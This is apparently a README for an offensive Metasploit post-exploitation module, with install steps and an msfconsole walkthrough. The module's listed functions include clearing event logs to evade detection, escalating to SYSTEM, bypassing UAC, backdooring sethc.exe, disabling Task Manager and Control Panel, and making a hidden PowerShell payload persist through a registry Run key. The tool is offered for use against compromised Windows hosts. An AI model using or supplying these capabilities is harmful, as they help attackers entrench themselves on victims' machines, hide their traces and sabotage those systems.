Developer: pedro ubuntu "r00t-3xp10it"
Suspicious Shell Activity Labs@2013 | r00tsect0r
APPL => enumerate intalled applications
CLEAR => clear IDS event logfiles on target host
GETPRIVS => Elevate meterpreter to AUTHORITY/SYSTEM privs
HOST => dump target hostfile to loot folder
HOSTFILE => add entrys to target hostfile <ip-add> <domain>
DELHOST => revert target hostfile to default settings
LOGIN => enumerate Recently logged on users
MSG => execute one message on target desktop
SESSION => the session to run the module on
UACSET => check if UAC is enabled and is settings
UACBYPASS => will bypass UAC settings using regedit
EXECUTE => will execute an cmd command on target host
LABEL => will rename the c: harddrive display name
SETCH => will backdoor setch.exe on target system
HIDETASK => restrict the use of TaskManager (hide)
STOPPROCESS => stop remote process from running (e.g iexplore.exe)
PANIC => Disable ControlPanel, hide Drives+desktop icons,
DisableTaskMgr, restric major browsers from running,
restart host,and display a msgbox at login time.
POWERSHELL PERSISTENCE => will persist a powershell.bat payload
deliver befor by 'netool.sh toolkit', also uploads a hidden.vbs
script to run the powershell in a hidden cmd windows and insert
a registry entry (HKLM\..\run) to run the payload at startup.
"powershell.bat and hidden.vbs must be stored in /var/www"
Special Thanks to [darkoperator & sinn3r] from Rapid7 Community,
and to [offensive security] online courses 'metasploit unleashed'
(the only CORE/API documentation available to study) :(
http://www.offensive-security.com/metasploit unleashed/Building_A_Module
http://www.offensive-security.com/metasploit unleashed/seful_API_Calls
[download the tool]
"open terminal and write"
wget https://sourceforge.net/projects/myauxiliarymete/files/my-auxiliary.tar.gz
tar -xvf my-auxiliary.tar.gz
[copy auxiliary to metasploit db]
sudo cp my-auxiliary.rb <path-to-metasploit-install>/msf3/modules/auxiliary/analyze/my-auxiliary.rb
example:
sudo cp my-auxiliary.rb /opt/metasploit/msf3/modules/auxiliary/analyze/my-auxiliary.rb
"Manually Path Search"
root@ubuntu:~# locate modules/auxiliary/analyze
meterpreter> background
msf exploit(handler)> reload_all
msf exploit(handler)> use auxiliary/analyze/my-auxiliary
msf post(my-auxiliary)> show options
msf post(my-auxiliary)> set SESSION 1
msf post(my-auxiliary)> set UACSET true
msf post(my-auxiliary)> exploit
[download the tool]
"open terminal and write"
wget https://sourceforge.net/projects/myauxiliarymete/files/my-auxiliary.tar.gz
tar -xvf my-auxiliary.tar.gz
[copy auxiliary to metasploit db]
cp my-auxiliary.rb <path-to-metasploit-install>/modules/auxiliary/analyze/my-auxiliary.rb
example:
cp my-auxiliary.rb /usr/share/metasploit-framework/modules/auxiliary/analyze/my-auxiliary.rb
"Manually Path Search"
root@kali:~# locate modules/auxiliary/analyze
meterpreter> background
msf exploit(handler)> reload_all
msf exploit(handler)> use auxiliary/analyze/my-auxiliary
msf post(my-auxiliary)> show options
msf post(my-auxiliary)> set SESSION 1
msf post(my-auxiliary)> set UACSET true
msf post(my-auxiliary)> exploit
[Develop/coded By]
pedro ubuntu aka r00t-3xp10it
Suspicious Shell Activity Labs@2013 | r00tsect0r Team